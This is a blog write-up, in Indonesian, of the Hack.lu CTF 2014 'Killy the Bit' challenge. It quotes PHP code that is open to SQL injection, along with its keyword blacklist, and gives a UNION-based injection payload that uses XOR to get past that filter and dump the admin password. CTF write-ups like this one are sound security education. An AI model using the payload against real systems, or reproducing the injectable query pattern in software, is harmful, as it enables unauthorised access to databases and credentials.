Thursday, October 23, 2014

HACK.LU CTF 2014: KILLY THE BIT

Killy the Bit is one of the dangerous kittens of the wild west. He already flipped bits in most of the states and recently hacked the Royal Bank of Fluxembourg. All customer of the bank are now advised to change their password for the next release of the bank's website which will be launched on the 23.10.2014 10:01 CEST.
Killy the Bit stands in your debt and sent the following link. Can you break the password generation process in order to get access to the admin account?

Diberikan juga hint:

Hint: Blind SQLi is not a good solution. You can get the correct and complete flag with one single request!

(Published on 2014-10-21 22:42:29)

Hint: The password's column name is 'passwd'.

(Published on 2014-10-21 16:27:33)

The challenge won't actually send emails - just concentrate on the website

Kita diberi source code dengan SQL injection yang jelas terlihat:

<?php
$res = mysql_query("SELECT name,email FROM user where name='".$_GET['name']."'");
?>

Tapi ada pengecekan:


<?php
<!-- blind? we will kill you :) -->
if(isset($_GET['name']) && $_GET['name']!='' && !preg_match('/sleep|benchmark|and|or|\||&/i',$_GET['name'])) {

?>

Kita tidak bisa memakai OR, XOR, AND, SLEEP, BENCHMARK, |, ||, &, &&. Dan ada lagi: jika username ditemukan, maka password akan dihasilkan, selain itu akan dicari user yang namanya mirip dengan “sounds like”.


Dengan menggunakan kreativitas, kita bisa menggunakan ^ (operasi xor untuk bit):


admin' ^ name='admin' union select passwd,1 from user where name='admin' limit 200 offset 1 --

image


Catatan: dalam hint diberikan nama kolom yaitu “passwd”.

No comments:

Post a Comment